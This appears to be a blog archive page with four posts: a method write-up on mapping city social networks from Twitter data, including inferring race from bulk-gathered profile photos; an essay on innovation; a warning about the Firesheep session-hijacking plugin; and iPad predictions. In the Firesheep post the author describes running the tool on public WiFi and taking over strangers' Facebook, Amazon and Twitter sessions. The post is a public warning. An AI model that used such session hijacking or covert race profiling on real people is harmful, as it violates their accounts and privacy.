Entries Tagged 'programming' ↓

The Math Behind Peoplemaps

For the last few years I’ve been working on mapping out social relationships in cities with my project peoplemaps.org. I had the chance to speak about this work recently at the TED Global conference, and the talk was featured this week on the ted.com website. This has led to many, many inquiries about the project, how it works, and the limits of its applicability.

So I wanted to take an opportunity to explain in high-level terms how I’m doing this work, what it tells us, and what it does not. I’ll attempt here to cover the approach in enough detail so others can reproduce it, without going into deep implementation details which are frankly not important to understanding the concepts. However, I’m happy to collaborate with anyone who would like to discuss implementations.

Theoretical Foundation

In the real world, each of us has personal relationships: our family, friends, co-workers, people we interact with in social settings, children and their parents and friends, and the like. The conventional wisdom is that we can maintain roughly 150 real-world relationships — this is called the “Dunbar Number,” named after the anthropologist who identified this phenomenon. Some people may have more, some people less, but 150 is probably average.

In an online setting, people may have many more relationships — perhaps a few thousand that they interact with in some meaningful way. However, the offline, real-world relationships that people have will likely be an overlapping subset of the relationships they have in an online setting. Online relationships are often more flexible (they can be global and operate at all times of day), though not always as meaningful. Still, if you are able to look at people’s online relationships in a specific geography, you have at least a proxy for understanding their offline, real-world relationships as well.

The ability to infer things about both offline and online interactions is derived from the principle of homophily, which sociologists identified as the powerful tendency for people to cluster into groups of people who are similar to themselves. Colloquially we know this through the saying, “birds of a feather flock together,” and it is powerfully demonstrated in network data.

So if we accept the notion that people do, in fact, have relationships that both shape and are shaped by their interactions, then it follows that there may be some ways to measure these relationships with at least some level of fidelity. Social network data appears to offer at least a window into these real-world relationships, though each dataset has biases which are not yet well understood. However, by comparing results from different networks, we can start to get a sense for what those biases might be.

This is where the state of the art for this research is right now: trying to understand how these different data sets are biased, the nature of those biases, and whether the biases are material in terms of distorting the “real world” network we are trying to understand. However, this lack of perfect understanding isn’t preventing people from using this data to do all kinds of things: from recommending movies to helping you find “people you may know” to identifying terror cells using cell-phone “metadata.” All of these activities use essentially the same approach.

These Maps Are NOT Geographic

A quick caveat: while we typically think of city maps as geographic, these maps are explicitly NOT geographic in nature. Rather, they are showing communities and their relationships to each other. The position of communities relative to the page is always arbitrary, their position relative to each other is determined by the presence or lack of relationships between them. I bring this up now to dissuade any notion you might have that these maps are geographic, despite whatever resemblance (real or imagined) they might have to geography. This all said, there are ways to tie these maps back to geography and use it as an additional investigative tool, but you should assume that all discussion of maps here is non-geographic, unless otherwise noted.

Gathering the Data — and Avoiding Bieber Holes

Depending on the dataset you are looking to explore, the exact details of how you gather data will vary somewhat; I have used data from Twitter, Facebook, LinkedIn, AngelList, email, and other sources. In all cases, you will want to gather a set of “nodes” (people, users, or companies, depending on the data source) and “edges” (relationships between them — typically “friend” or “follow” relationships.)

For the case of the city network maps, this is the approach I have used with Twitter data:

  1. Define a target geography using a geographic bounding box.
  2. Determine a set of keywords and location names that users inside the target geography may use to identify their location/geography.
  3. Identify a set of “seed” users within the bounding box, or which otherwise appear to verifiably be within the target geography.
  4. Determine which user identifiers are followed by a given user, and record that in a list that maintains the number of followers for a given user identifier.
  5. When a given user identifier is followed by a number of people exceeding a threshold, request the full user information for that user to see if it appears to be within the target geography.
  6. If that user is within the target geography, then feed it into step 4, requesting the user identifiers followed by that user.
  7. Repeat steps 4-7 until there are few new additions to the dataset.

Doing this process once produces a “first draft” data set, which can then be visualized for inspection — to look for improper inclusions, obvious exclusions, and any particular data artifacts or pathologies.

At this stage, various problems may appear. As an example, if you are trying to visualize Birmingham UK, you will likely end up with some data for Birmingham, Alabama, due to legitimate confusion which may exist between the two communities. At this point, you can modify the test used to determine whether something is inside the target or not, and regenerate the dataset, as well as perform additional data gathering iterations to get more of the “right” data. This process typically takes a few iterations to really drill down into the data you’re looking for.

One persistent problem I’ve come across is a phenomenon called Bieber Holes, which are essentially regions of the network occupied by Justin Bieber fans. They are so virulent, and their networks so dense, that only aggressive exclusion filters can prevent the algorithm from diving down into these holes and unearthing millions of Beliebers — only a fraction of which may pass location tests. Anyway, I’ve developed good techniques to avoid Bieber holes (and similar phenomena) but it’s a reminder that when working with data from the public with algorithmic approaches, editorial discretion is required.

Laying out the Network Graph

There are dozens of algorithms for laying out network graph data, each optimized to illustrate different properties of the graph. Since I’m primarily interested in homophily and clustering, I’m looking for layouts that express communities of relationships. A good way to do that is to use a force-directed graph layout algorithm; with this approach, relationships act like springs (expressing Hooke’s law), and each user or node repels nearby nodes (expressing Coulomb’s law). By iteratively drawing the graph based on these forces, the graph will eventually reach a steady state which exhibits the following properties:

  1. People with many relationships between them will be arranged into tight clusters.
  2. People with the fewest relationships between them will appear at opposite edges of the graph.
  3. People who have many relationships at both ends of the graph will appear in the middle.
  4. Clusters with few or no relationships between them will appear very far apart on the graph.

You can think of this in very simple terms. If you have a room full of 10 people, there can be a total of 45 relationships between them (n * (n-1)/2, since someone is not friends with themselves). If every person is friends with every other person, this network will appear as a perfect and symmetric “ball” under the rules of a force directed graph layout.

Likewise, let’s suppose that same room of 10 people was grouped into two groups of 5 people, and that those two groups hated each other and refused to speak, but each member of each group knows every other member of their own group. You would see two perfect “ball” layouts (each with 10 relationships expressed), but with no connection between them.

When we visualize data from a city in this way, we are essentially measuring the separateness of communities — whether we see several of these separate groups or whether we see one unified community.

Note that in the example with 10 people in one group, we have a total of 45 relationships, while in the example with two groups of 5, there are only 20 (2 x 10). Scaling that up to a city of 500,000 people, if the city was fully meshed, there would be 124,999,750,000 total relationships, while if that city is segregated into two groups of 250,000, there can only be 31,249,875,000 relationships in each group, or 62,499,750,000 total relationships across both groups, which is a little less than half of the number of relationships possible if the two groups merged.

Detecting Communities and Adding Color

Within the network, we can use algorithms to detect distinct communities. Communities are defined by the number of shared relationships within a given subgroup. We use an algorithm called the Louvain community detection algorithm, which iteratively determines communities of interest within the larger network, and assigns a community membership to each user accordingly.

We can then assign each of these assigned communities a color. For my work so far, I have assigned these colors arbitrarily, with the only goal of visually differentiating one community from another. This helps to generate an aesthetically pleasing visual representation.

While communities often correlate to clustering exhibited by the layout algorithm, for nodes that are not clearly members of only one cluster, color can be used to indicate their primary community affiliation. This is helpful in the visualization because generates blended color fields that can give a sense of the boundary between two communities.

For example, a group primarily concerned with politics (blue) and a group primarily concerned by music (yellow) may have a mix of both blue and yellow nodes in the space between those distinct communities, and you can get a sense that those people are very interested in both communities and which their primary affiliation might be.

Assigning Node Size with In-Degree

In a graph of Twitter users, it can be helpful to indicate how many people are following a given user within our specific graph (note that this is calculated for our subgraph, not taken from a user’s “global” follower count as displayed by Twitter.)

We can do that by making the “dot” associated with each user bigger or smaller based on the number of followers. This has no real effect on the shape of the network, but it can be helpful in determining what kinds of users are where, and how people have organized themselves into communities of interest.

Determining Community Interests

After you have a colored graph with communities and clusters, it’s time to try to figure out what these clusters seem to be around. The first thing to do is to start by manually inspecting nodes to see who they are — often starting with the biggest nodes first. Typically you’ll find that people often organize themselves into groups like these: sports, music, mainstream media, politics, food, technology, arts, books, culture, and the like. These clusterings vary somewhat from city to city, but you’ll see some common patterns between cities.

After communities are detected, we can start to monitor traffic coming out of these communities to look for topics of conversation and other characteristics which may be helpful in explicating the observed clustering. For instance, we can gather a corpus of Twitter traffic for each community, recording:

  1. hashtags
  2. commonly shared links
  3. languages in use
  4. operating systems in use (desktop vs. mobile et al)
  5. client software in use
  6. geographic coordinates (as provided in GPS)
  7. age of user accounts
  8. user mentions

With this kind of data recorded as a histogram for each community, we can start to get a pretty good sense that a given group is mostly concerned with sports, music, politics, and the like. By working with a collaborator who is well-versed with the culture of a given place, we can also get a sense of local subtleties that might not be immediately obvious to an outside observer. These insights can be used to generate legends for a final graph product, and other editorial content.

Investigating Race

Another phenomenon is very apparent in American cities: people separate by race. American cities like Baltimore and St. Louis are polarized into black and white communities, with some people bridging in the middle. These cities present roughly as eccentric polygons, with differences in mesh density at each end of a racially polarized spectrum. Relatively prosperous European cities, like Munich or Barcelona, present more like “balls,” with no clear majority/minority tension displayed. Istanbul, by contrast, shows a strong divide between the rich, establishment and a large emergent cohort of frustrated young men.

In many American cities, we do observe strong racial homophily in the data. For example, in the data for a city like Baltimore, people at opposite ends of the spectrum are generally strongly identifiable as “very white” or “very black.” This is a touchy subject, and it’s difficult to discuss this topic without offending people; however, what we are aiming to do here is to try to understand what the data is showing us, not make generalizations or prescriptive measures about race.

One way to ground this discussion about race is to look at the profile photos associated with user accounts. We can gather these photos in bulk, and when displaying them together, it becomes quickly clear that people have often organized themselves around skin color. When they have not organized themselves around skin color, they are organized around other cultural signifiers like fashion or style. This can give us a concrete sense that certain communities consist primarily of one race or another. However, this is not to suggest that outliers do not exist, or to make any statement either about any given individual — and certainly does not suggest an inverse relationship between race and the ability or proclivity to participate in any given cluster or clusters.

The Final Product

Once we have refined the data, identified communities, investigated trends and topics within communities, and potentially looked at photos, profiles, and other cultural signifiers, we are in a position to annotate the network map with editorial legends. This is a fundamentally human process. I generally use a tool like Photoshop or Keynote to annotate an image, but this could be done in a number of ways. Once this step is done, a final product can be exported.

This entire process of taking data from one or more biased sources, refining data, and then using a human editor who also has a bias produces a final end product which is comparable to an “op-ed” in a newspaper: it’s an expression of one possible mental model of the world, informed by a combination of facts, errors, and pre-existing opinions. It’s up to the reader to determine its utility, but to the extent it offers a novel view and the reader deems the data and editorial biases acceptable, such renderings can be an informative lens through which to see a city.

A Note About Bias, Inclusions, and Exclusions

A common criticism of large-scale social network analysis is that it is not representative because it is biased in some way. A typical statement is, “I don’t use Twitter, so the results don’t include me, therefore I question the validity of the approach.” Likewise, people may say the same thing about LinkedIn or Facebook, or start into a long explanation of how their online habits are very different from their offline reality. These are important facts to consider, but the question is really whether network analysis is representative enough to start to deliver information that we didn’t have until now.

To answer this, it’s helpful to think about this in terms of recent history. In 2004 or 2007, it probably wasn’t helpful to say anything in particular about data from social networks, because none of them had enough penetration to deliver insights beyond a very biased community of early adopters: whether it was geeks in the case of Twitter, or young music fans in the case of MySpace, or college students in the case of Facebook.

As these networks have continued to evolve, however, their penetration is increasing rapidly. They are also accreting a great deal of historical data about people and their position in social networks which give us clues as to their offline interactions. This accretion of data will only continue and begin to paint a more complete and multi-dimensional picture of our culture — especially if you correlate the data from multiple social networks.

I believe we are now at a point where these data sets are large and detailed enough to offer important insights about our “real world” culture. This belief is based on two facts. First, it’s possible to get a good working image of a community by gathering data over just a few hours. While we make every effort to gather as much data as is realistically possible before making statements about a community, the effect of adding more data is additive: we add members to the community, but we do not fundamentally alter its shape.

To understand this effect, it is helpful to consider an analogy from astronomy. A more powerful telescope can yield a better, sharper image of a star formation, but it neither changes the shape of the star formation or our basic understanding of its structure. Better tools simply yield more detailed data. I believe we are at a point where we have enough data to begin to understand structures, and that more data will yield more detailed understanding — but not alter the fundamental shapes we are beginning to uncover. This line of thinking is helpful in comprehending “exclusions.”

On the subject of “false inclusions,” these are generally sussed out in the layout and review process, but all of the graphs I have produced have generated a limited number of false inclusions as a practically inevitable artifact of the process. As a result, any statements one may make about a specific individual based on this kind of analysis may or may not be valid: they should be viewed through the lens of the biases disclosed alongside the visualization. However, repeated experience has shown that removing false small number of false inclusions does not have a material effect on the community structure.

On the subject of “network bias” (I don’t use x, therefore conclusions are not valid), when comparing data from Facebook, Twitter, LinkedIn, AngelList and other sources, the same patterns of homophily are exhibited. While each network has its own bias (LinkedIn towards professionals, Twitter towards both youths and professionals, Facebook towards Grandparents), if we limit analysis to a given geography, we will inevitably see homophilic tendencies which are correlated in each network.

While it’s difficult to speak about this in detail yet, as obtaining full comparable data sets from each source is currently quite challenging, early investigations indicate that the same patterns are exhibited across all networks. This squares up with the notion that what we are really doing in examining these networks is but a proxy for real world relationships. Ultimately, these networks must converge into something that approximates this abstract, Euclidian reality, and as we get more data and correlate it, it’s likely that a unified data set will closely reflect the actual geometry of our communities.

Future Research Directions

This kind of analysis is forming the basis for the emergent field of “computational sociology,” which is currently being explored by a variety of researchers around the world. This work has a number of important implications, and poses questions like:

  • What do we mean by diversity? If we should be looking to bridge networks, is race a helpful proxy for that function? Or should we be looking to develop new better measures of diversity?
  • What is the nature of segregation? Is physical segregation a product of our social networks? Or is it a manifestation of them?
  • What is the role of urban planning? Is our social fabric something that’s shaped by urban planning, or are our cities simply a manifestation of our social fabric?
  • What kind of interventions might we undertake to improve a city’s health? Should they be based first on creating and improving relationships?
  • What is creative capital and how can we maximize it? If creative capital is a byproduct of relationships between people with diverse backgrounds, then we should be able to increase creative capital by orders of magnitude by bridging networks together and increasing the number of relationships overall.

The level of detail we are able to extract from network data in cities is more detailed than any data source we have ever had, and can supplement many other indicators currently used to measure community health and make decisions about resource allocation. For example, the census may tell us someone’s race, family name and physical address, but it tells us very little about their participation in the social fabric. And if we believe that the city is primarily manifested as the sum total of social relationships, then clearly data surrounding social interactions is more useful than other attributes we may harvest.

Discerning Stable Structures vs. Topical Discussions

Likewise, many researchers have been using social network data like Tweets to characterize conversations around a topic; and it is true that by harvesting massive quantities of Tweets, one can discern trends, conversation leaders, and other insights. However, this type of analysis tends to be topical and shift a great deal depending on whether people are active online, and contains biases about why they might be active online. Regardless, this kind of research is well worth understanding, and may ultimately lead to a better understanding of network structure formation. However, I want to differentiate it from the kind of inquiry I am pursuing.

So, rather than “you are what you tweet,” I believe the truth is something more like “you tweet what you are.” Network follow structures tend to be very stable; while they do change and evolve over time, one interesting feature of the process I am using is that it tends to be very stable over time and the results of analysis are repeatable. That is to say, if I analyze Baltimore one day, and then repeat the analysis a month later, I will obtain a comparable result. This is not likely to be the case with semantic analysis as topics and chatter may change over the course of a few weeks.

Tracking (and Animating) Changes Over Time

Because network structure analysis is fundamentally labor intensive and somewhat difficult to compute, it’s difficult to automate and to perform on an ongoing basis. For example, it would be nice in Baltimore to know whether things are getting “better” or “worse.” Right now, only by taking periodic snapshots and comparing them can we get a sense for this. It would be helpful to be able to animate changes over time, and while this is theoretically possible, tools to do this have to be built by hand right now. My hope is to apply such tools to the process and dramatically increase our ability to monitor network structure in real time, and spot trends.

Ultimately, this will give us some ability to see our social structure change in near real-time, developing a sense as to whether interventions are having a positive effect, or any effect at all.

Healthy vs. Unhealthy Network Patterns – and Brain Development

Dr. Sandy Pentland, an MIT researcher who is perhaps the leading figure in the field of computational sociology, has suggested that there are certain patterns that characterize “healthy” networks, as well as patterns that characterize “unhealthy” networks.

Healthy networks are characterized by:

  • Frequent, short interactions
  • Broad participation by all nodes and meshing
  • Acknowledgement of contributions
  • A tendency to explore other parts of the network

By contrast, unhealthy networks exhibit the opposite patterns: broadcast vs. peer-to-peer interactions; fewer network connections; isolated subnetworks; a lack of exploration of other parts of the network.

Perhaps the most telling finding is that these patterns are not limited to just human networks, but also appear in other colony-based organisms, like bees. It appears that there are universal patterns of network health that apply to life in general.

The other important finding is that lack of network exploration affects brain development in young people. Specifically, young people who grow up in an environment where network exploration is not valued tend to exhibit structural changes in the brain which appear to dampen their desire to explore networks as adults. This produces a multi-generational effect, where children who grow up in isolated networks tend to persist in isolated networks, and to pass that on to their children.

This suggests that one possible intervention is to promote network exploration at an early age across the entire population. How we might do this is certainly open to discussion, but it seems to be a very powerful tool in breaking down divisions in our social networks.

What’s next?

As this project advances, we are gathering ever-larger datasets. This requires more and more computational power and distributed algorithms for visualization. If this is something you’re also working on, I would like to talk to you — please contact me. There are some interesting challenges in scaling this up but there are interesting opportunities emerging to apply these approaches!

Mapping Your City

We have a long list of places that we’re looking at mapping, and trying to prioritize opportunities. If you have a mapping project you would like us to consider, please contact us. We will try to get back to you as quickly as possible, but in general, we’re looking for projects that can make a serious social impact. It takes a serious amount of effort to generate these maps, so be thinking about possible partners who could potentially fund this work and help advance this science.

Real Innovation Takes Time

Combinatorial Innovation

There are so many new technologies today: tablets, geolocation, video chat, great app frameworks. It is easy to cherry-pick off “combinatorial” innovations that seem compelling, and can maybe even be monetized readily.

But all those innovations are inevitable. If our technologies afford a certain possibility, they will occur. “That’s not a company, that’s a feature,” is one criticism I’ve heard of many “startups.”

These combinatorial, feature-oriented “X for Y” endeavors are often attractive because they can often be built quickly.

Startup Weekend events send an implicit message that a meaningful business can be fleshed out in just a couple of days. And I argue that is not true. That might be a good forum to get practice with building a quick combinatorial technology and working with others, but a real innovation, much less a meaningful business, takes real time.

I think people are often looking in the wrong places for innovation, often because they don’t really take the time to do the homework, observation, and deep reflection necessary to arrive at a true insight. We want things to be quick and easy.

Changing Minds, and Behaviors

The biggest innovations require asking people to change their beliefs, habits, and behaviors.

iPhone: “why would I want a smartphone without a physical keyboard? It’s too expensive. I can’t install apps.”

Twitter: “what is this for? Why would anyone do this? Who cares what I had for breakfast?”

iPad: “an expensive toy. Could never replace a real laptop. Can’t run real office applications. The enterprise will never adopt it.”

Foursquare: “only hipsters and bar hoppers would ever do this. They are letting people know when to rob them. I don’t want people to know where I am.”

And these innovations have taken years of constant attention to bring to their current state. And they are not done.

One Innovator’s Story

Dennis Crowley, founder of Foursquare, was in the room at Wherecamp in 2007 where I was giving a talk about location check-in habits via Twitter (a subject I knew well because of my Twittervision service, which allowed this.)

Dennis, of course, also founded the precursor to Foursquare, Dodgeball, which he sold to Google in 2004 (they promptly killed it.)

But Dennis wanted to see his vision come to pass, and he knew it would someday be possible — though at that point the iPhone had not been released and it would be nearly two years before it supported GPS location technology.

But there Dennis was, doing his homework in 2007, studying user behavior to figure out exactly what behaviors he would have to encourage to make Foursquare work.

He asked me, “so, people are really putting their home and work locations formatted inside tweets in order to update their location?”

“Yep, a few thousand times a day,” I replied.

“That’s cool. That’s really cool stuff,” he said. And from that, and years of similar evidence-gathering and study, Foursquare would be born.

So, creating Foursquare took about five years. (I could have “stolen” the idea and built Foursquare myself. But I didn’t execute on that; it was his vision to pursue.) Dennis did his homework. He was prepared. And his vision preceded the technology that enabled it.

Why, not How

Real innovation doesn’t come from a weekend. It comes from passion, years of study, understanding deep insights and the “why,” and persistence in seeing something new to market, along with the marketing and cheerleading that will make it successful.

The iPad owes much to Steve Jobs’ love of calligraphy. He cultivated a sense of aesthetics because of that initial interest. He didn’t set out to “make money” but rather dedicated himself to changing the world for the better using the entirety of his humanity. Time studying art wasn’t “lost,” it was R&D for the Mac, iPhone, and iPad.

Many of today’s entrepreneurs could stand to do less “hustling” and more reading, exploring, reflecting, and gathering input — and when it is time to make stuff, set their sights as high as possible.

There is more to this world than money, and there are countless opportunities to make it a vastly better place. Rather than using our CPU cycles just playing with combinatorial innovations, let’s devote ourselves to making the world as amazing as possible. Try to take time to reflect on how you can make the world better, and not just on what current technology affords.

Drop Everything and Pay Attention to Firesheep Now

Firesheep is a startling plugin that allows anyone to easily impersonate the login credentials of others for dozens of sites. It works on any unencrypted WiFi connection and is stupid-simple to setup. It can be done by anyone in a matter of minutes.

Just to illustrate how easy it is to setup, I was on Virgin America flight VX67 from Washington to San Francisco yesterday.

All I had to do to get going with Firesheep was download Firefox (onto my new MacBook Air) using the in-flight WiFi, and then download the Firesheep plugin for Firefox. Just drag the plugin into Firefox and it installs. Reload Firefox and you’re ready to go.

Click “Start Capturing” and you are instantly snooping on every interaction occurring on the WiFi network. In my case yesterday, that meant snooping on everybody who was using the WiFi on my flight.

What’s At Risk?

Within just a couple of minutes, I was able to impersonate 3 people on Facebook (updating their status, exploring friends, doing anything I wanted to – of course I didn’t). Twitter is also at risk. So is Gmail. And so is Amazon.

Access to Amazon is perhaps the most worrying. Once I realized I was in under someone else’s Amazon account, I quickly shut down Firesheep: this is some scary stuff. What if I had changed the shipping address for the account and done a one-click order on a $10,000 watch or a $2,000 plasma TV?

This was all at 37,000 feet in an airplane (and way more entertaining than SkyMall). Like taking candy from a baby.

Even More Shocking…

Later in the afternoon I was at one of the Internet Industry’s high-profile events: Web 2.0 Summit produced by O’Reilly. There on the hotel’s WiFi, which was setup to serve the summit, I ran Firesheep. Within seconds I had compromised about 25 accounts, including the Twitter accounts of O’Reilly Media and TechCrunch writer Alexia Tsotsis. Change passwords, tweet-as-them, friend and de-friend people? No problem. Here’s what I saw. (Note that my accounts were vulnerable as well.)


How It Works

I have not studied this exploit carefully enough yet to explain it in full detail, but my understanding is that on an open WiFi network, it’s trivial to capture in cleartext all of the web interactions of the users around you on the same IP network. Once you can do that (something Firesheep achieves using the pcap library, capturing port 80) then you can sniff for credential information specific to particular websites. Firesheep supports a couple of dozen out of the box, including all major social networking sites (Facebook, Twitter, Gmail, Gowalla, Foursquare) but also some more obscure sites relevant to coders (Github, Pivotal Tracker). Ouch. It even has an “import” function so others can write exploits for sites that Firesheep doesn’t know about yet.

The bottom line is that these sites all need to enforce the use of HTTPS (secure HTTP) rather than HTTP *before* the login handshake occurs. This will force some emergency changes by many sites over the next few days.

This is not a new exploit – it’s always been possible to do this; Firesheep just makes it stupid easy.

A Note On Passwords vs. Encryption

You’ve encountered WiFI networks that require WEP or WPA encryption passwords. These are secure from Firesheep’s reach. However, there are a lot of WiFi networks that require “passwords” (such as those at coffee shops, hotels, etc) that are in fact open networks. Many do not even require you to login to them to exploit them via Firesheep. To put it in perspective, every Starbucks location is vulnerable to attack.

The only for-sure ways to stay safe from Firesheep for now are to 1) use only encrypted WiFi networks (that use WPA or equivalent), 2) use wired networks that you trust. Any open WiFi network can and will be vulnerable to this attack until vulnerable sites switch to using HTTPS for all authentication. Be very careful out there, folks.


Update: After talking with a few folks and thinking through this exploit a little further, I can offer a bit more complete of an explanation of how it works and why blocking it is so difficult.

The exploit does not actually capture the *password* itself (which is actually transmitted using HTTPS) but rather captures the authentication credentials which are stored (and visible) in the session cookie *after* HTTPS authentication has completed.

So, even a one-time password will not address this. And the reason boils down to ads and other unsecure content that folks want to serve as part of the site experience. To fix this problem would require serving ads (and images) via HTTPS, which would require major computing resources and will have a major impact on the web.

According to one security researcher I spoke to this evening (who formerly ran Yahoo mail), there’s no obvious way around this other than to allow both HTTP and HTTPS content to be served from the same site during the same session, something which presently causes an alert to the user (which would have the result of freaking them out). Such an alert is a good thing; turning it off is not a net gain. It shouldn’t be up to the user to have to sort out which resources the site is requesting should be secure and which ones do not need to be.

So, it’s a real dilemma. No one seems to be sure how to really address it other than to eliminate or curb the use of open networks, which is probably where it’s going to end up. So open WiFi is now basically over. Expect places that had been using it to post publicly available WPA passwords, which solves the problem.

iPad: What Will Happen

I’m enjoying watching folks around the world prognosticate about the iPad, what it is and is not, how it might sell and what it means for computing. Sorry, but I can’t help but weigh in with some predictions.

My son (age 12) and I have a bet at the moment about the outcome of the NCAA basketball tournament, which I know nothing at all about: I wagered that Duke would emerge victorious (I ignored the rest of the brackets). If I am correct, he owes me $487 trillion dollars; otherwise I owe him $12. (Hey, I’m trying to teach him about Popperian philosophy.)

So, it is with the understanding that if I’m right, you, dear reader will owe me $487 trillion dollars, that I offer this humble marketplace analysis.

  • iPad will be released on Saturday, April 3. That means that a ton of people are going to get to play with it over the Easter weekend. And I’m talking about peoples’ moms and aunts here. It’s been widely reported that the experience of using the device is quite seductive, and I’ve argued it’s because it activates different parts of the brain. Somewhere around 200,000 units will be sold over this coming weekend, and each one will be shown to an average of 10.6 other people, creating a latent (nagging) demand for another 21 million units.
  • A bunch of old-media outlets will rejigger their offerings for the iPad and try to monetize the audience. Many already have. But this is Waterloo. Or Little Big Horn. They will sucker some folks into using the device for the “traditional” content, but sales will be disappointing. Ultimately they are going to have to radically reconsolidate their offerings and innovate in some serious ways. See below re: piracy.
  • The device is going to continue to rip through the population, busting past all sales records for a general computing device. This will have nothing to do with features or even the apps (yet). This will be based on the user experience alone. Everyone who uses the thing comes away sounding like a religious convert. In the same way that the original iPod just “felt right,” Jony Ive has managed to bring meaning to a general purpose computing device like nothing ever before. The central thing Ive has done is to bring the experience of computing directly to the user, with no barriers and no “analog” devices like the mouse. People will have a visceral relationship with these devices.
  • Roughly 20% of the initial batch of Wi-Fi only devices will be “handed down” to a secondary wave of users when the 3G models are introduced a month later. This will amplify the initial sales numbers, as many folks end up buying two units in the first month.
  • PDF-format books and news will become the Lingua Franca. What happened to music and movies is about to happen to books. A wave of piracy will couple with a race to the bottom in content prices. Some killer app, possibly Kindle for iPad, will capture a big chunk of the market share. It doesn’t much matter how it plays out, but paper books are going to be items of “significance” and the kind of thing hipsters trade, like vinyl records.
  • All desktop software will seem obsolete overnight. The obsessive attention Apple has paid to aesthetics in the built-in reader, calendar, and email apps will set the bar not only for other app developers on the iPad, but also for the iPhone and particularly the Desktop. Expect your Mac to feel particularly creaky. And Windows? It’s gonna seem steampunk compared to the twee aesthetics and colors emerging in the iPad design universe.
  • WiFi is going to become even more ubiquitous and free. Businesses are going to trip over themselves to get iPad users into their establishments, as the iPad rides its way to prominence. WiFi-only iPads are going to be somewhat cooler than the 3G versions.
  • Hipsters are gonna start using iPads as cell phones, using Skype and similar apps to bypass carrier relationships altogether. I’d expect the 3G-iPads to be used for voice too, marking the first significant use of the cellular network in a “data-only” mode, which will ultimately lead to the scrapping of the whole “voice/voicemail/minutes” paradigm. The first carrier to do this will have a temporary competitive advantage.
  • A whole new market in mouseless/keyboardless computing will emerge. Yeah, I don’t know what it’s going to look like either. But the raw numbers (100 million by 2015) of the iPad platform will create a new kind of pop/tech culture. Expect a New York Times Sunday magazine piece; potentially in that publications’ last print issue.
  • The next generation Macintosh, if there is such a thing, will be based on the iPad OS. Hard to say what this might mean, but I would not be surprised if Mac OS was phased out over a few years, or possibly converted into a server-only OS for the MacPro / X-Serve platform only.

Remember that demand is not static waiting to be filled by the possible universe of devices: if that were the case, the iPod and the Mac and the iPhone should never really have gotten any traffic. What Apple understands is that good design can change the market, and invent new markets.

And this is what the iPad will do: invent a new market. And the presence of that new market will profoundly change the dynamics of the existing (previous) market. New demand will emerge, and all kinds of new supply will emerge. The great thing about Apple, particularly Jobs and Ive, is that they know how to drive change.

And that, ultimately, is what entrepreneurship and innovation are all about. If it were just about building devices to match the demands of the existing market, the Chinese seem to do a pretty good job of that.

And I will supply my banking information, so you can wire me the money, when this all comes to pass. If I’m wrong, I’ll buy you a beer.